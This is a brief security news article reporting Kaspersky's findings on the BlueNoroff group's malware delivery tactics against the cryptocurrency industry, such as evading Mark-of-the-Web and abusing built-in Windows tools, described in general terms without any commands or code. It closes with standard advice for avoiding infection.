3 - 5 minute read
Cybersecurity firm Kaspersky has released new information about the financially motivated BlueNoroff group, which has been targeting the cryptocurrency industry. In October, Kaspersky observed the group adopting new malware strains, including file types and infection methods to evade the Mark-of-the-Web (MOTW) security measure. This security measure displays a warning message when a user tries to open a file downloaded from the internet. BlueNoroff has been using .iso and .vhd file formats to bypass MOTW.
In addition to these file formats, the group has also been testing different file types, including a Visual Basic Script, a Windows Batch file, and a Windows executable, in order to refine its malware delivery methods. Kaspersky has discovered more than 70 domains used by the group, indicating that it has been active until recently. Many of these domains imitate Japanese venture capital companies, suggesting that BlueNoroff has a particular interest in Japanese financial entities.
To spread its malware, BlueNoroff has been using Word documents and shortcut files for initial intrusion. In one observed campaign, the group sent a malicious Word document to a victim in the UAE. After the document was launched, it connected to a remote server and downloaded the payload. The group has also been using SyncAppvPublishingServer.vbs, a legitimate script in the system folder, to execute PowerShell scripts via a Windows scheduled task.
Kaspersky has also discovered that BlueNoroff has been using batch files and legitimate files such as mshta.exe and rundll32.exe to deliver its malware. The group has been using decoy documents and fetching the next stage payload through the use of cURL commands.
It is important for cryptocurrency traders to be cautious of this new threat from BlueNoroff. To avoid falling victim to this group, it is essential to be cautious of any suspicious Word documents or files downloaded from the internet, and to keep security software up to date. It is also important to be aware of the tactics that BlueNoroff is using, such as evading MOTW and using different file types, in order to better protect against this group.
Precautions everyone should heed to avoid becoming a victim
- Use strong, unique passwords for all accounts and regularly update them
- Avoid clicking on links or downloading attachments from unknown sources
- Enable two-factor authentication whenever possible
- Use a reputable antivirus software and keep it updated
- Enable firewall protection on your devices
- Keep your operating system and other software up to date with the latest security patches
- Avoid using public Wi-Fi networks for sensitive activities
- Be cautious when sharing personal or financial information online
- Avoid using weak passwords or reusing passwords for multiple accounts
- Regularly backup your important data to prevent loss in case of an attack.
